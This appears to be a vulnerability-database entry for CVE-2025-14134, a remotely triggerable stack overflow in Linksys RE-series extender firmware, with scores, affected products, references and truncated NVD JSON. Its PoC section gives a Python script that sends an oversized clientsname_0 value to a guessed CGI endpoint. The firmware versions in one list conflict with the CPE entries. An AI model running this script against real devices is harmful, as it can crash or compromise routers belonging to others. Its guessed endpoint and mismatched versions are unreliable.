CVE-2025-14134

Description

A vulnerability was determined in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this issue is the function RE2000v2Repeater_get_wireless_clientlist_setClientsName of the file mod_form.so. Executing manipulation of the argument clientsname_0 can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Linksys RE6500 固件 1.0.013.001

Linksys RE6250 固件 1.0.04.001

Linksys RE6300 固件 1.0.04.002

Linksys RE6350 固件 1.1.05.003

Linksys RE7000 固件 1.2.07.001

Linksys RE9000 固件 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-14134 PoC - Linksys RE series buffer overflow
Note: This PoC is for educational and security research purposes only.
"""

import requests
import sys
import argparse

def exploit_buffer_overflow(target_ip, target_port=80):
    """
    Exploit stack-based buffer overflow in RE2000v2Repeater_get_wireless_clientlist_setClientsName
    """
    # Construct malicious payload with oversized clientsname_0 parameter
    # This creates a buffer overflow condition
    payload = "A" * 1000  # Large payload to overflow stack buffer
    
    # Target endpoint (typically the form handler)
    url = f"http://{target_ip}:{target_port}/wlfrt-encrypt.cgi"
    
    # Construct POST data with vulnerable parameter
    data = {
        "clientsname_0": payload,
        "submit_button": "Wireless_Repeater",
        "change_action": "",
        "action": "Apply"
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-14134 PoC")
    parser.add_argument("target", help="Target IP address")
    parser.add_argument("-p", "--port", type=int, default=80, help="Target port")
    args = parser.parse_args()
    
    exploit_buffer_overflow(args.target, args.port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14134
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14134
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14134/
[4] VulDB https://vuldb.com/cve/CVE-2025-14134
[5] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md
[6] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md#poc
[7] https://vuldb.com/?ctiid.334523
[8] https://vuldb.com/?id.334523
[9] https://vuldb.com/?submit.697981
[10] https://www.linksys.com/
[11] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md
[12] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_63/63.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14134", "sourceIdentifier": "[email protected]", "published": "2025-12-06T11:15:48.437", "lastModified": "2025-12-10T18:00:27.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this issue is the function RE2000v2Repeater_get_wireless_clientlist_setClientsName of the file mod_form.so. Executing manipulation of the argument clientsname_0 can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Linksys RE6500, RE6250, RE6300, RE6350, RE7000 y RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Afectada por este problema es la función RE2000v2Repeater_get_wireless_clientlist_setClientsName del archivo mod_form.so. La ejecución de la manipulación del argumento clientsname_0 puede conducir a un desbordamiento de búfer basado en pila. El ataque puede lanzarse de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:*", "matchCriteriaId": "92354C9C-D1B2-4143-803D-DE5EF7842184"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "52622B22-2E42-443B-81DA-7C42ECCF0564"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:*", "matchCriteriaId": "70728D67-153A-49FA-80E2-0DE9086DA253"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "898FD ... (truncated)